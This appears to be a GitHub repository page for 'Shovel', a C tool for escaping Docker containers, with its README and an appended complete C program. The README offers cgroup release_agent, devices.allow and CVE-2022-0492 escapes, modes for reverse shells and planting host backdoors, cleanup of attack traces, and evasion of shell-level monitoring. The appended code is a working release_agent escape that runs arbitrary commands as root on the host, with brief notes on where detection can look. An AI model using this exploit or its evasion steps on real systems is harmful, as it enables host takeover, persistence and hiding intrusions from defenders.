Repository: https://github.com/SPuerBRead/shovel (GitHub, owner SPuerBRead, language C, default branch master, last push 2022-12-15, 262 stars, 24 forks, no license file)
Description: Docker容器逃逸工具 (Docker Escape Tools)
Topics: capability, container, docker, escape, security, security-tools

## Shovel

A Docker container escape tool.

1. Escaping with the `mount` command trips an alert?

2. The box's `unshare` has no `-C` (`--cgroup`) option?

3. No scripting-language runtimes (Python, Perl, ...) on the machine?

4. The existing escape programs are too large to pull onto the target?

If you have hit any of the above, try this program. In principle it is the usual pile of escape shell scripts, rewritten as direct system calls, so the steps never pass through bash and are not picked up by shell-level monitoring. Note what that does and does not buy you: it sidesteps command-line telemetry (bash history, `execve` logging of `mount`/`unshare`/`sh -c`), but any sensor that watches the underlying operations (a `mount(2)` of cgroupfs, a write to `release_agent` or `devices.allow`, a new user/cgroup namespace) still sees exactly the same activity.

![](./img/shovel.gif)

## Features

* Supported escape methods
  * release_agent (cgroup v1 `notify_on_release` / `release_agent`)
  * device_allow (the cgroup v1 `devices.allow` controller file)
  * cve-2022-0492 (obtain CAP_SYS_ADMIN through a new user + cgroup namespace and return a shell in the new namespace)


* Supported storage drivers (used to resolve the container's rootfs path on the host, which the release_agent method needs; use `-p` if auto-detection fails)
  * device_mapper
  * aufs
  * btrfs
  * vfs
  * zfs
  * overlayfs


* Supported exploitation modes
  * exec: run a command on the host
  * shell: get a host shell
  * reverse: reverse shell
  * backdoor: plant a backdoor on the host and run it


* Automatically cleans up attack traces

## Usage

```text
usage: shovel [options ...]

Options:
Options of program
    -h, --help                           show help message
    -v, --version                        show program version
Options of escape
    -r, --release-agent                  escape by release-agent
    -d, --devices-allow                  escape by devices-allow
    -u, --cve-2022-0492                  get cap_sys_admin by cve-2022-0492 and return new namespace bash
Options of other
    -p, --container_path=xxx             manually specify path of container in host,use this parameter if program can't get it automatically
    -m, --mode=xxx                       the mode that needs to be returned after a successful escape { exec | shell | reverse | backdoor }
    -c, --command=xxx                    set command in exec mode
    -I, --ip                             set ip address in reverse mode
    -P, --port                           set port in reverse mode
    -B, --backdoor_path                  set backdoor file path
    -y, --assumeyes                      automatically answer yes for all questions
Mode (-m) type guide
    exec:     run a single command and return the result
    shell:    get host shell in current console
    reverse:  reverse shell to remote listening address
    backdoor: put a backdoor to the host and execute
```
## Building

Build against the oldest glibc you can: a binary built against a newer glibc will not run on an older target system because the loader cannot satisfy the newer `GLIBC_x.y` symbol versions (linking with `-static` avoids the problem entirely).

If the build environment has kernel headers older than Linux 4.6, which introduced the `CLONE_NEWCGROUP` constant, or the following error appears for any other reason:

```text
/docker/opt/shovel/exploits/cve_2022_0492.c:30: error: 'CLONE_NEWCGROUP' undeclared (first use in this function)
```

use the code on the [no_0492](https://github.com/SPuerBRead/shovel/tree/no_0492) branch. That version does not include the cve-2022-0492 exploit and replaces some C99 constructs so that it compiles on old machines as far as possible.



```shell
cmake .
make
```
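To make concrete what "escape shell scripts rewritten as system calls" means, here is the cgroup v1 release_agent escape expressed as direct `mkdir`/`mount`/`open`/`write` calls, together with the two preconditions the tool has to establish first: whether CAP_SYS_ADMIN is in the effective capability set, and the container's writable layer path as seen from the host (what Shovel resolves per storage driver and what `-p` overrides). This is an added example written for this page, not Shovel's own code. It assumes the overlay2 driver (other drivers need a different path lookup), cgroup v1, an unmounted `rdma` controller to mount, and a scratch directory `/tmp/cg_demo` inside the container; all of these are my assumptions, not facts from the page.

```c
// Added example, not Shovel's own code: the cgroup v1 release_agent escape
// written as direct system calls instead of a shell script, plus the two
// precondition checks the tool relies on. Assumptions (mine, not the page's):
// overlay2 storage driver, cgroup v1, an unmounted "rdma" controller, and a
// scratch directory /tmp/cg_demo inside the container.
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

#define CAP_SYS_ADMIN_BIT 21

/* Parse a "CapEff:\t<hex>" line from /proc/self/status: 1 if CAP_SYS_ADMIN
 * (bit 21) is in the effective set, 0 if not, -1 if the line is not CapEff.
 * Default Docker gives 00000000a80425fb (no SYS_ADMIN); --privileged gives
 * 0000003fffffffff. */
int capeff_has_sys_admin(const char *status_line) {
    const char *p = strstr(status_line, "CapEff:");
    if (!p) return -1;
    unsigned long long mask = strtoull(p + 7, NULL, 16);   /* skips the tab */
    return (int)((mask >> CAP_SYS_ADMIN_BIT) & 1ULL);
}

/* From one /proc/self/mountinfo line, extract upperdir= of the overlay mount
 * at "/": the container's writable layer as seen from the host, which is
 * where release_agent (resolved by the host kernel) must point. 0 on success. */
int overlay_upperdir(const char *line, char *out, size_t outlen) {
    const char *p = line;  /* fields: id parent maj:min root mountpoint ... - fstype src opts */
    for (int i = 0; i < 4; i++) { p = strchr(p, ' '); if (!p) return -1; p++; }
    if (strncmp(p, "/ ", 2) != 0) return -1;             /* only the root mount */
    const char *sep = strstr(p, " - ");
    if (!sep || strncmp(sep + 3, "overlay", 7) != 0) return -1;
    const char *u = strstr(sep, "upperdir=");
    if (!u) return -1;
    u += strlen("upperdir=");
    size_t n = strcspn(u, ", \n");
    if (n == 0 || n >= outlen) return -1;
    memcpy(out, u, n);
    out[n] = '\0';
    return 0;
}

/* Convenience: does the line's upperdir equal expected? (1/0) */
int overlay_upperdir_is(const char *line, const char *expected) {
    char buf[PATH_MAX];
    return overlay_upperdir(line, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

static int write_file(const char *path, const char *s) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    ssize_t n = write(fd, s, strlen(s));
    close(fd);
    return n == (ssize_t)strlen(s) ? 0 : -1;
}

/* The escape itself: no /bin/sh is spawned in the container; the host kernel
 * runs our script as the release agent. Needs CAP_SYS_ADMIN in the initial
 * user namespace (or, on kernels vulnerable to CVE-2022-0492, a fresh
 * user+cgroup namespace). cmd runs as root on the host; its output lands in
 * <upperdir>/output, i.e. /output inside the container. 0 if every step worked. */
int release_agent_escape(const char *upperdir, const char *cmd) {
    const char *cg = "/tmp/cg_demo";                       /* assumed scratch dir */
    char path[PATH_MAX], buf[PATH_MAX + 256];
    if (mkdir(cg, 0755) && errno != EEXIST) return -1;
    if (mount("cgroup", cg, "cgroup", 0, "rdma") && errno != EBUSY) return -1;
    snprintf(path, sizeof path, "%s/x", cg);
    if (mkdir(path, 0755) && errno != EEXIST) return -1;
    snprintf(path, sizeof path, "%s/x/notify_on_release", cg);
    if (write_file(path, "1")) return -1;
    snprintf(buf, sizeof buf, "%s/cmd", upperdir);         /* host path of /cmd */
    snprintf(path, sizeof path, "%s/release_agent", cg);
    if (write_file(path, buf)) return -1;
    snprintf(buf, sizeof buf, "#!/bin/sh\n%s > %s/output 2>&1\n", cmd, upperdir);
    if (write_file("/cmd", buf) || chmod("/cmd", 0755)) return -1;
    /* A child joins the cgroup and exits; the now-empty cgroup triggers the agent. */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char me[32];
        snprintf(me, sizeof me, "%d", (int)getpid());
        snprintf(path, sizeof path, "%s/x/cgroup.procs", cg);
        _exit(write_file(path, me) ? 1 : 0);
    }
    int st = 0;
    if (waitpid(pid, &st, 0) < 0 || !WIFEXITED(st) || WEXITSTATUS(st)) return -1;
    sleep(1);                                              /* agent runs asynchronously */
    return 0;
}

/* usage: ./demo [command]; without a command it only reports the preconditions. */
int main(int argc, char **argv) {
    char line[8192], upper[PATH_MAX];
    int admin = -1, found = 0;
    FILE *f = fopen("/proc/self/status", "r");
    if (f) { while (fgets(line, sizeof line, f)) if (!strncmp(line, "CapEff:", 7)) admin = capeff_has_sys_admin(line); fclose(f); }
    if ((f = fopen("/proc/self/mountinfo", "r"))) {
        while (!found && fgets(line, sizeof line, f)) found = overlay_upperdir(line, upper, sizeof upper) == 0;
        fclose(f);
    }
    printf("CAP_SYS_ADMIN=%d overlay upperdir=%s\n", admin, found ? upper : "(none; Shovel's -p covers this case)");
    if (argc < 2 || admin != 1 || !found) return 1;
    if (release_agent_escape(upper, argv[1])) { perror("release_agent_escape"); return 1; }
    if ((f = fopen("/output", "r"))) { while (fgets(line, sizeof line, f)) fputs(line, stdout); fclose(f); }
    return 0;
}
```

Run without arguments it is a harmless precondition probe that defenders can use too: a container that reports `CAP_SYS_ADMIN=1` and a resolvable upperdir is exactly the container this class of tool escapes from. The shell-script version of the same steps leaves `mount`, `echo` and `sh -c` in process telemetry; this version leaves only the `mount(2)` call and the writes to the cgroup files, which is where detection has to look.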